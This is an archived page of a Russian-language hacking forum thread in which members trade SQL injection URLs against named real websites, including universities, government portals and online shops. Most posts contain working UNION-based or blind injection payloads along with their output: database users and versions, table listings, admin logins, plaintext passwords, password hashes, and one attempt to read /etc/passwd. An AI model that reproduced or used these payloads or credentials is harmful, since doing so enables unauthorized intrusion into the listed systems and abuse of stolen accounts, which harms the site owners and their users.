SQL Инъекции [Архив] - Страница 22

neon_fx

06.04.2008, 02:51

http://ubs-ua.com/rus/board/rub_notice31.php?pageNum_R1=5&totalRows_R1=549&kod_rubob=-41400+union+select+1,2,3,4,5,6,7,8,concat_ws(char( 32),user(),version(),database())/*&type_ob=2

ubs_biont@localhost
4.1.22-standard-log
ubs_base

.acme

06.04.2008, 09:06

http://www.candw.lc/Media/news2.php?ID=-1+union+select+1,concat(username,0x3,password),3,4 ,5,6,7,8+from+users+limit+0,1--

cwslu@localhostcwslu4.0.18-nt

Админ: cwwebadmin
Пасс:2gether
Еще два юзера: cwmobileweb1 : all456tyc и ecommerce : 22team

truelamer

06.04.2008, 09:51

http://www.iiea.com/newsxtest.php?news_id=99999999+union+select+1,conc at(user(),char(58),database(),char(58),version()), 3,4,5,6,7,8+/*

institu_admin@web16.hosting365.ie
institu_db
5.0.45-community-log

table:
wp_users

columns:
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered

admin:f165c973574a46835d36c560f4a97e2d

расшифруем...

admin:03cc18

truelamer

06.04.2008, 11:47

http://mqup.mcgill.ca/book.php?bookid=1'

Скула 5 версии
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring(version(),1, 1))='5'

подобрал одну таблицу чуть не умер

http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+tabl e_name+from+information_schema.tables+limit+17,1), 1,1))='a'

http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+tabl e_name+from+information_schema.tables+limit+17,1), 2,1))='u'
.......

http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+1+fr om+authors+limit+0,1),1,1))='1'

Дальше обломило...

сасибо xcedz

NilsonUA

06.04.2008, 16:03

http://www.klsu.al/index.php?pg=faqe&id=-9999+union+all+select+ 1,2,3,concat(user,char(58),pass,0x7c,0x7c),5,6+fro m+users--

cash$$$

06.04.2008, 16:25

http://www.hdcu.org.uk/articles/article.php?ID=99999+union+select+VERSION(),2,3/*

VERSION: 4.0.15-nt
USER: emalone@localhost
DATABASE: haghilldb

http://www.thekingswaytoronto.ca/index.php?id=99999+union+select+1,VERSION(),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29/*

VERSION: 4.1.22-standard
USER: yourcms_lynch@localhost
DATABASE: yourcms_db

http://www.cfenet.ubc.ca/content.php?id=99999+union+select+VERSION(),2,3,4, 5,6,7,8,9,10,11,12,13/*

VERSION: 4.1.22-log
USER: fixate_fixate@localhost
DATABASE: fixate_bcc

http://www.ihrc.org.uk/show.php?id=99999+union+select+1,2,VERSION(),4,5,6 ,7,8,9,10,11,12,13/*

VERSION: 4.0.27-standard-log
USER: dbo120565932@212.227.119.149
DATABASE: db120565932

truelamer

06.04.2008, 16:42

http://www.24abc.ru/xzakaz2.php?f_id=-1+union+select+1,concat(user(),char(58),version(), char(58),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20/*

user24abc1@localhost
5.0.24-standard
db_user24abc1

-=megahertz=-

06.04.2008, 19:35

http://www.terminalservice.ru/index.php?id=-32+union+select+0,1,2,3,4,5,concat(version(),0x3a, user(),0x3a,database()),7,8,9/*
version - 4.0.25
user - termin02@hux.hc.ru
database - wwwterminalservi

BizzyD

07.04.2008, 00:31

http://www.classpad.org/details.php?id=99999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16/*
classpaddb@localhost
classpad_xmb2
5.0.45-log

Fuckel

07.04.2008, 02:20

_http://www.analisi.ru/regulations.php?id=-1+union+select+1,concat_ws(CHAR(58),DATABASE(),USE R(),VERSION()),3,4/*

besplod9:besplod9@v46.valuehost.ru:4.0.27-max-log

neon_fx

07.04.2008, 02:33

http://danko.dn.ua/news.php?id=-17+union+select+1,concat_ws(char(58),version(),use r(),database()),3/*&lang=ru
5.1.22-rc
root@localhost
danko
----------------------------------------------------------------------
http://danko.dn.ua/news.php?id=-17+union+select+1,concat_ws(char(58),user,Password ),3+from+mysql.user/*&lang=ru
root:*7827D3186CC7C1FF860E859079F1DBE1BB72A289

//*******************************************

http://www.newizv.ru/news/?id_news=-11675+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18/*

u10605@10.10.12.75
u10605
5.0.45

CaNNabi$

07.04.2008, 13:43

http://agun.kz/
http://agun.kz/?id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,10/*
4.1.22:alarko@localhost:wwwalarkokz

http://gafgaf.ru/
http://gafgaf.ru/index.php?rid=0x2d3127%20union+select+1,2,3,4,5/*
5.0.37-LOG:ALEXUSER_GAFGAF@LOCALHOST:ALEXUSER_GAFGAF

http://www.wollemipine.sk/
http://www.wollemipine.sk/page.php?lang=ru&id=0x2d3127%20union+select+1,2,3,4,5,6/*
4.1.21:db11330xwp@82.119.226.130:db11330xwp

by CaNNabi$

ThreeD

07.04.2008, 13:54

http://www.aei.brookings.org/publications/abstract.php?pid=296+UNION+SELECT+1,2,concat_ws(0x 3A3a,user(),version(),database()),4,5,6,7/*

PR-5

aei_brookings@10.225.135.70:
:4.0.25-standard-log:
:aei_brookings
__________________________________________________ ______________________

http://www.terntv.com/programmedetails.php?pid=-11+union+select+1,concat_ws(0x3A3a,version(),user( ),database()),3,4,5,6/*

4.1.22-standard:
:terntv@server213-171-218-210.livedns.org.uk:
:tern
__________________________________________________ ______________________
http://www.stjerome.co.uk/page.php?id=-508+union+select+concat_ws(0x3A3a,version(),databa se(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37/*

PR-6

4.1.20:
:stjerome_new:
:dbaccess@mailserver.phidev.co.uk

Есть таблица user.В ней нашёл поле password. Имя подобрать не удалось. Админка: http://www.stjerome.co.uk/admin
__________________________________________________ ______________________

-=megahertz=-

07.04.2008, 13:55

MANHATTAN Technology With Vision
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,version(),6,concat(database (),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19, 20/*
version - 4.0.17-log
user - u10001203@lon1-webmysql-1.msh.demon.net
database - u10001203

-=megahertz=-

07.04.2008, 13:59

//A World Of Islands
http://www.aworldofislands.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,concat(version(),0x3a,datab ase(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20/*
version - 4.0.27-max-log
user - islands@linhost141.prod.mesa1.secureserver.net
database - islands

ThreeD

07.04.2008, 14:29

http://www.ipodhacks.com/article.php?sid=-2482+union+select+1,2,3,4,concat_ws(0x3A3a,version (),user(),database()),6,7,8,9,10,11/* :D

PR-6

4.0.27-standard:
:ipodhack_user@localhost:
:ipodhack_mainsite

Fuckel

07.04.2008, 17:00

http://www.auto-instructors.ru/user/comment_text.php?inid=-1+union+select+1,2,3,4,concat_ws(CHAR(58),VERSION( ),DATABASE(),USER()),6,7,8,9/*
не раскрыл: http://www.auto-instructors.ru/paper/interesting/index.php?sort=-stat
4.1.22-log:wwwautoinstructo:autoinst@localhost

http://www.rustoy.ru/dog.php?screen=1&id=-1+union+select+concat_ws(CHAR(58),DATABASE(),USER( ),VERSION())/*
kayrueru_rustoy:kayrueru@81.177.16.93:4.1.22
http://www.rustoy.ru/dog.php?screen=1&id=-1+union+select+concat_ws(CHAR(58),name,password,em ail)+from+users/*
admin:4acc53e9d2ce2f1df7c4c8f9588ffc29:brt@rusdog. ru
4acc53e9d2ce2f1df7c4c8f9588ffc29 = rusdog

http://www.specialradio.ru/mkz/?id=-1+union+select+1,concat_ws(CHAR(58),DATABASE(),USE R(),VERSION()),3,4,5,6,7,8,9/*
host2283:host2283@localhost:4.0.27-log
выключен отчет об ошибках, проверил 2-1

http://www.trolza.ru/project.pl?id=-1+union+select+1,concat_ws(CHAR(58),VERSION(),DATA BASE(),USER()),3,4,5,6/*
5.0.27:trolza:trolza@localhost
колонки какие-то драные, так же отчет об ошибках отключен

bag

07.04.2008, 20:16

http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,co ncat(user,0x3a,password),5,6,7,8,9,10+from+mysql.u ser/*
кто пройдет дальше отпишите чтоли)

sD0S

07.04.2008, 20:53

http://www.lowensign.com/lowensign_v2/cart/show_cart.asp

Version : Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 1)

Databases :
"C:\Program Files\Microsoft SQL Server\MSSQL$CGLIVE2\Data\"
master, tempdb, model, msdb, cg-live,
LowenSignTest, lowensign, Sun, SchwanComp, cartTemp,
lowensports, mining, emailMaster, carMakeModel, CGPartners,
ReeceNicholsComp, Data

bag

07.04.2008, 22:04

а че с antiбояном то, смотрю предыдущие сайты туда не добавленны!!!

Muhacir

07.04.2008, 22:13

http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,co ncat(user,0x3a,password),5,6,7,8,9,10+from+mysql.u ser/*
кто пройдет дальше отпишите чтоли)

http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,lo ad_file('/etc/passwd'),5,6,7,8,9,10+from+mysql.user/*

load_file ;)

bag

08.04.2008, 14:09

http://www.cerias.purdue.edu/about/FAQs/view.php?catid=99999999+UNION+SELECT+1,2,concat_ws (0x3a,username,userpasswd),4+from+dbforms_user/*
5.0.44-log
cerias_www
webuser@kargad.cerias.purdue.edu
admin:fa70c9ea3c56f56440e565e28e046a6d

http://www.comexus.org.mx/Summer/participants.php?id=9999999+UNION+SELECT+concat(us er,0x3a,password)+from+mysql.user/*
5.0.27-standard
cmeadmin_comexus@comexus.org.mx
root:*9709835E424A4547ADC49E973DF05221F5788033

http://www.takj.gov.cn/show.php?id=9999999999999999'+UNION+SELECT+1,conca t(user,0x3a,password),3,4,5,6,7,8,9,10,11+from+mys ql.user+limit+0,1/*
4.0.24-nt
chengguo@localhost
chengguo:255ae04c2135cdd9

http://www.sborsedlec.cz/index.php?option=com_myalbum&album=99999999/**/UNION/**/SELECT/**/1,2,concat(user,password),4,5+from+mysql.user/*
5.0.45-Debian_1-log
kamilecko@localhost
root

debian-sys-maint*E944BA4811D33C20C9DD89DB1669186D0AFBACE5

http://www.zacro.co.zw/index.php?option=com_myalbum&album=-1+union+select+1,2,password,4,5+from+mysql.user+li mit+0,1/*
*0D2F033F991098398763E1BBB9383BAA4C9D6683

http://techjobskollam.gov.in/index.php?option=com_myalbum&album=99999999/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5+from+mysql.user/*
5.0.22
root@localhost
root:02793fd200b31a19

http://www.hhne.org/index.php?pgid=999999+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,concat(user,0x3a,password),17 +from+mysql.user/*
yroot:499e19e660225444

http://wikipedia.aksw.org/index.php?qid=9999999999+UNION+SELECT+1,concat_ws( 0x3a,user,password),3,4,5+from+mysql.user/*
5.0.38-Dotdeb_1.dotdeb.0-log
root@localhost
root:*76AF2D7B9C25E2D32355578842125DE03FD0CFDD

http://www.mcguireglobalrecruitment.com/careerFairs.php?fid=9999999+UNION+SELECT+1,concat( user,0x3a,password),3,4,5,6,7+from+mysql.user/*
5.0.37-standard
mcguireglobal@localhost
root:5a7f6b305ae8f33f : fpara

http://www.seaportvillage.com/restaurants/retailer.php?rid=999999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31+from+mysql.user+limit+0,1/*
http://www.seaportvillage.com/restaurants/retailer.php?rid=999999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31+from+mysql.user/*
5.0.27
website@localhost
root:
wikiuser:07b2a22645a08a9c : sup3rm@n

http://www.rba.ru/news/vid_news.php?id=999999999+UNION+SELECT+1,2,concat( user,password),4,5,6,7,8,9,10,11,12,13,14+from+mys ql.user/*
4.0.24_Debian-10sarge1-log
root@localhost
root
nobody
mnogo5a7004084ef44a99
debian-sys-maint45688eb06db8e261
super15c956b5675c9821
test606717496665bcba
rba

http://www.sdbireras.ru/product_detail.php?id=9999999+UNION+SELECT+user,pa ssword+from+mysql.user+limit+0,1/*
4.1.20
root@localhost
root:765ba8f84be69cdd

http://www.artport.co.nz/view.php?med=9999999999999+UNION+SELECT+concat(use r,0x3a,password),2,3,4+from+mysql.user/*
4.0.20
webuser@localhost
root:57f7a24f45500f72

Велемир

08.04.2008, 16:45

Было это или нет хз,но вот ))

1. http://rusarhiiv.pohjarannik.ee/print.php?sid=-89+union+select+uname,2,3,4,5,6+from+nuke_users+li mit+1,1

http://rusarhiiv.pohjarannik.ee/print.php?sid=-89+union+select+pass,2,3,4,5,6+from+nuke_users+lim it+1,1

Тут два вариант - или моя голова не работает,или concat_ws xDD.

2. http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,id,4,5,6,7,8,9,10,1 1/

Есь таблицы Suppliers, products и т.д. (подбирать не стал,лень :Р

P.S. dipl.spb.ru был взломан, ток ща не работает )

truelamer

08.04.2008, 23:39

http://www.mirmet.spb.ru/catalog.php?g=1&c=-1+union+select+1,2,3,concat(user(),char(58),versio n(),char(58),database()),5,6,7/*

mirmet@localhost
4.0.23-standard
db_mirmet

Dimi4

09.04.2008, 14:12

bit16.ru
Путь: /home/us4258/bit16.ru/www/src/title.php on line 74
INJ:
Отображаеться в теге <title></title>
Database():db4258b
Version():5.0.33
user():us4258a@localhost
http://bit16.ru/index.php?gl=roms&cat=x32&act=cont'union+select+1,2,3,user()/*
:)

.acme

09.04.2008, 21:34

http://www.endiama.co.ao/news.php?id=9999+union+select+1,2,3,4,concat_ws(0x 40,id,username,password)+from+users+limit+0,1--

1@webmaster@web123master
2@endiama@endiama198web

Пароли убили. :)

http://gdf.org.ly/index.php?lang=en&CAT_NO=3&Page=105&DATA_NO=-136+union+select+1,2,3,concat_ws(0x40,user(),datab ase(),version()),5,concat_ws(0x40,name,pass),7,8,9 ,10,11,12,13,14,15,16,17+from+users--

gdforg_gdf@localhost@gdforg_new@4.1.22-standard
Administrator@aa63633f1f89fa976bdbe073d9f2e2d3

Учусь..

http://www.soc.com.ly/media/index.php?cid=1&id=-9+union+select+1,concat_ws(0x40,user(),database(), version()),3,4,5,6,7,8,9,10,11,12+from+users/*

-=megahertz=-

10.04.2008, 10:30

Продажа программного обеспечения
http://itex.ru/po/sale/?pid=-4+union+select+1--
version - 5.0.41-log
user - itex@cub.mplik.ru
database - itex

Dimi4

10.04.2008, 12:40

Продажа программного обеспечения
http://itex.ru/po/sale/?pid=-4+union+select+1--
version - 5.0.41-log
user - itex@cub.mplik.ru
database - itex
уто ищо и рут походу
_http://itex.ru/po/sale/?pid=-4+union+select+1,2,TABLE_NAME,4+from+information_s chema.tables/*
;)

-=megahertz=-

10.04.2008, 22:25

уто ищо и рут походу
_http://itex.ru/po/sale/?pid=-4+union+select+1,2,TABLE_NAME,4+from+information_s chema.tables/*
;)
я вкурсе, выкладываю тут не по причине незнания...

xcedz

10.04.2008, 22:27

я вкурсе, выкладываю тут не по причине незнания...

блин а если в курсе и можешь достать какого не делаешь? получается что сделал ты на половину ...

Велемир

11.04.2008, 03:09

http://www.downtowncrossing.org/shop/shop.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usr,0x71) ,0x71),3,4+from+ssp_usrs+limit+1,1--

Table: ssp_usrs
Columns: pwd,id,email,usr

login: dca
password: brigley1969

login: kcrawford
email: downtowncrossing.org
password: 52fc3a

table: admin
column: user_id, username, password

login: dca2
password: kate

login: dca1
password: dertg1

ПИЗДЕЦ......нет слов. ни один пасс не подходит. Есть ещё таблица ssp_account с полем account_id, но мя канкретно зае это уже). Без энкрипта лучше не пробывать, выдаёт ашиппку,хоть и не везде =___= (реагирует на поля pwd и usr).

P.S. У кого дальше получится напишите в лс,или выложите тут. ОЧень интересно

.acme

11.04.2008, 07:14

http://www.tco.re/index.php?Page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x40,user(),database(),version()),14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41/*

user: tcoadmin@localhost
database: tco
version: 5.0.41-log

mysql.user: tcoadmin@*76692089A5E971F66C637F66F48EB82E39EE04B3

.acme

11.04.2008, 08:39

http://www.stat.uz/stat/index.php?lng=2&article=999+union+select+1,2,3,4,5,6,unhex(hex(con cat_ws(0x3,user(),database(),version()))),8/*

user: ODBC@localhost
database: stat
version: 4.1.12

-=megahertz=-

11.04.2008, 11:43

блин а если в курсе и можешь достать какого не делаешь? получается что сделал ты на половину ...
слухай а мож тебе еще базу их тут выложить или еще ченить дать?
делай сам...на этом получаешь опыт!

-=megahertz=-

11.04.2008, 13:25

Интернет магазин
http://www.greatmagazines.co.uk/store/displayitem.asp?sid=69&id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

version - Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

неполучилось получить таблицы...

-=megahertz=-

11.04.2008, 13:31

Интернет Магазин
http://www.myfavouritemagazines.co.uk/store/displayitem.asp?sid=416&id=1+or+1=@@version--
так же неполучилось...

_Pantera_

11.04.2008, 13:33

http://www.stat.uz/stat/index.php?lng=2&article=999+union+select+1,2,3,4,5,6,unhex(hex(con cat_ws(0x3,user(),database(),version()))),8/*

user: ODBC@localhost
database: stat
version: 4.1.12

http://www.stat.uz/stat/index.php?lng=2&article=999+union+select+1,2,3,4,5,6,unhex(hex(con cat(user,char(58),password))),8+from+mysql.user/*
_________

http://www.pacedirect.co.uk/section.php?id=-2+union+select+1,2,3,4,5,concat(id,char(58),un,cha r(58),pw),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26+from+pacedb.admins/*
1:dwinsh1p:45YtuV

http://www.pacedirect.co.uk/section.php?id=-2+union+select+1,2,3,4,5,concat_ws(char(58),id,use rname,salt,password,email),7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26+from+pacedb.user/*
1:super:c072d5eb784ea5b27e81ef26c7bd42fc:ad3579b46 a059783c71603891c747efaf8d74c16:threethirdsfull@gm ail.com
2:admin:1d25131da018647d045559f1bdfb19c1:8c5b6f5a6 85e0011be103b5d31a28b40a90c1e2d:ali@designdisclosu re.com

Jokester

11.04.2008, 15:11

Офф сайт иллиноиса(Кажись :D)

.gov
http://starkco.illinois.gov/calendar.php?display=event&id=-177+union+select+1,concat(user(),char(58),version( ),char(58),database()),3,4,5,6,7,8,9,10,11,12/*&date=2007-Feb-01&returnto=month

gostark@localhost:4.1.22-standard:gostark_Community

BizzyD

11.04.2008, 22:54

http://www.macspeech.com/pages.php?pID=99999+union+select+1/*
newsite_user@localhost:newsite:5.0.45-community-log

Админка: https://secure.macspeech.com/storeadmin/login.php

NilsonUA

12.04.2008, 16:06

http://www.gamer.hr/tips/bg.php?id=-1+union+all+select+1,concat(email,char(58),passwor d),3,4,5,6,7+from+user/*

radiax@net.hr:58ee6cec39128423

MaSter GeN

12.04.2008, 16:13

http://mylosinj.info/de/news/newskom.php?newsid=52 union select 1,2,3,version(),user(),database()/*
user:creslosi@localhost
ver:4.1.22-max-log
бд:creslosi

NilsonUA

12.04.2008, 16:34

http://www.taylorsclassics.co.uk/products/puding_details.php?id=-1+union+all+select+1, concat(username,char(58),password),null,null,5,6,7 ,8,9,10+from+users/*

bwsadmin:treacle

truelamer

12.04.2008, 18:41

http://www.detki.ru/index.php?mode=gallery&id=-1+union+select+1,2,3,concat(version(),char(58),dat abase(),char(58),user()),5,6/*

5.0.45-community
detki07_detki
detki07_detki@localhost

http://www.detki.ru/index.php?mode=gallery&id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables+limit+17,1/*

albums
custompages
filials
items
shops

shops
---------------
name
activity
addr

bag

12.04.2008, 21:18

народ, все выкладывают "стандартно" ?**=-1+union+select
если кому не трудно скиньте какие нить не "стандартные" скули, а то эти надоели а других скулей я не знаю,поделитесь опытом))))

truelamer

12.04.2008, 21:38

http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat(login,char(58),passwd) ,5+from+cmsuser+limit+2,1--

Stats:20052005

bag

12.04.2008, 23:31

эх ладно...,посимвольный это понятно, хотелось бы увидеть скули на других sqlах,что-нибудь кроме mysql.
кстати антибоян так и не работает,все что раньше скули есть туда не добавляются(отсюда не понятно за чем он нужен и стоит ли ваще проверять есть ли там!!).
мож кому понадобится(с оформлением особо заморачиваться не буду,больно мног овремени занимает)))):
Факультет Наук о Материалах - МГУ
http://www.fnm.msu.ru/main.php?topic=9999999999999/**/UNION/**/SELECT/**/1/*
MEDucation. Медицина для умных= :: Портал молодых докторов
http://www.meducation.com.ua/index.php?name=PNphpBB2&file=viewforum&f=9999999999999/**/UNION/**/SELECT/**/useR(),2/*
Неофіційна газета Київського університету
http://gazeta.univ.kiev.ua/index.php?act=view&id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11/*
портал iPages
http://www.ipages.ru/index.php?item_id=432&op=47&id=9999999999999/**/UNION/**/SELECT/**/1,2,3/*
Дагестанский Государственный Педагогический Университет
http://www.dgpu.ru/index.php?area=1&p=static&page=9999999999999'/**/UNION/**/SELECT/**/1,version(),3,4/*
Исламская Цивилизация
http://www.islamcivil.ru/article.php?aid=9999999999999/**/UNION/**/SELECT/**/1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13, 14/*
Программа образовательных кредитов КРЕДО
http://www.prokredo.ru/college.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Тульский государственный университет
http://www.tsu.tula.ru/index.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4/*
Бизнес-обучение в Новосибирске
http://www.bonsk.ru/company.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*
Одесский Государственный Медицинский Университет
http://www.odmu.od.ua/index.php?v=9999999999999/**/UNION/**/SELECT/**/1/*
Информационный портал KURSKCITY.RU
http://www.kurskcity.ru/news.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11/*
Интернет-агентство NetService
http://www.netservice.ru/portfolio_details.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12/*
ННГУ :: Вестники Нижегородского государственного университета им. Н.И. Лобачевского
http://www.unn.ru/index.php?file=vestniki_journals&jnum=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12/*
Омский государственный технический университетгазмяс ;)
http://www.omgtu.ru/newsite/index.php?module=news&action=full&nid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/*
Там, где начинается Крым! - Крымский портал
http://www.start.crimea.ua/directory/sites.php?categoryes_id=9999999999999'/**/UNION/**/SELECT/**/1/*
Университет Пяти Наук Дзогчен Шри Сингха - Dzogchen Lineage
http://www.dzogchenlineage.ru/modules/publication/category.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4/*
ИЗБРАННОЕ - Каталог ресурсов интернета
http://www.favorites.net.ua/kuk/razd.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/*
Интернет - магазин RusAtlet.com
http://www.rusatlet.com/show_items.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Интернет магазин элитной косметики. Косметика класса люкс.
http://www.kosmetuka.ru/show_cat.php?catid=3518&grid=9999999999999/**/UNION/**/SELECT/**/1/*
Едим Дома - еженедельная телепередача
http://www.edimdoma.ru/recipt_temat_local.php?idr=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21/*
Доставка товаров по Питеру
http://www.dommoy.ru/product_info.php?products_id=9999999999999'/**/UNION/**/SELECT/**/1/*
Объединенный портал пищевой промышленности Украины
http://www.ukrfood.com.ua/commerce/aenvelope.php?loc=6&letter=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/*
Компания АБИКОМ - официальный дилер СкайЛинк
http://www.askylink.ru/index.php?&lang=&menusel=2&menu=&submenu=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7/*
ВААЛ
http://www.vaal.ru/show.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11/*
Портал об образовании за рубежом
http://www.studying.ru/index.php?razd=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6/*
Global Study - Образование за рубежом и в Узбекистане.
http://study.uz/index.php?nav=23&sub=9999999999999'/**/UNION/**/SELECT/**/1,2,3/*
Информационно-визовая компания
http://infovisa.ru/index.php?id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
ГОРОДСКОЙ ИНФОРМАЦИОННЫЙ САЙТ КИЕВА
http://www.gorspravka.kiev.ua/newkiev.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Сервер досуга и развлечений DVOREC.RU
http://www.dvorec.ru/links/section.php?sec=9999999999999/**/UNION/**/SELECT/**/1/*
LinkRU.Ru - твой рейтинг сайтов
http://www.linkru.ru/top.php?cat=9999999999999/**/UNION/**/SELECT/**/1,2,3/*
cmbc.ru : тренинги | дистанционное обучение | коучинг
http://www.cmbc.ru/courses.php?ID=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4/*
Загородный отдых, базы отдыха, ленинградская область отдых, финляндия туры, аренда коттеджей, активный отдых
http://www.zagorod.net/index.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
ЗАГРАНИЦА - информационно-аналитическая газета
http://www.zagran.kiev.ua/article.php?new=415&idart=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
EURO - Homepage
http://www.euro-online.org/cyphor/show.php?fid=4&id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,unhex(hex(version())),8,9,10/*
Moscow Phone Directory :: Moscow's virtual community for English speaking expats and Russians
http://www.expat.ru/phonedir.php?cid=9999999999999/**/UNION/**/SELECT/**/1/*
ShopCar.ru - продажа подержанных автомобилей
http://shopcar.ru/zip_info.php?id=9999999999999'/**/UNION/**/SELECT/**/version()/*
HONDA.BY
http://honda.by/menu.php?id=74&parent=2&subparent=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*
ОКНА.ua - Каталог Металлопластиковых Окон Украины
http://okna.ua/pr_pl.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Автогазета - новости автомобильного рынка, доска бесплатных частных объявлений о продаже и покупке автомобилей
http://www.autogazeta.com/news.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3/*
Интернет магазин радиосвязи с доставкой. Один из самых дешевых в Москве
http://www.radiomag.com.ru/main.php?cat=9999999999999/**/UNION/**/SELECT/**/unhex(hex(version()))/*

Сегмент.RU - канцелярские товары // Рынок офисных принадлежностей и канцтоваров
http://www.segment.ru/jfund.php?view_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25/*
Юридические статьи. Комплексное юридическое обслуживание Регистрация товарных знаков Екатеринбург Незаконное использование товарного знака, торговой марки Арбитраж Суд Правовая защита недвижимости
http://www.intellectpro.ru/stat/index.php?view_id=9999999999999/**/UNION/**/SELECT/**/1/*
Новое Слово
http://novoeslovo.info/main.php?id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4/*
Печь, печь-камин, барбекю
http://www.pechka.biz/main.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6/*
Автоновости - продажа и тюнинг авто - автомобильные советы и авто развлечения на АвтоЛидер ИНФО
http://www.autolider.info/news/main.php?id=287&id_rub=9999999999999/**/UNION/**/SELECT/**/1/*
РЕ-АНИМАЦИЯ
http://re-animation.ru/main.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11/*
Santa Barbara Film Commission
http://www.filmsantabarbara.com/index.php?cat=149&subcat=999999999999/**/UNION/**/SELECT/**/1/*
Все о фотографии в Нижнем Новгороде
http://www.photogorky.ru/category.php?cat=999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Сайт болельщиков хоккейного клуба ЦСКА
http://www.hccska.ru/index.php?showfile=1&fid=30&p=downloads&area=1&categ=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,uname,pass),3+from+koobi4_user/*
admin:560f0ea462cbc6645e4f8ba0b9eeaee0
Играй.ру v3.13+
http://www.igray.ru/reviews.php?rid=9999999999999+UNION+SELECT+1/*
Информационный нотариальный портал
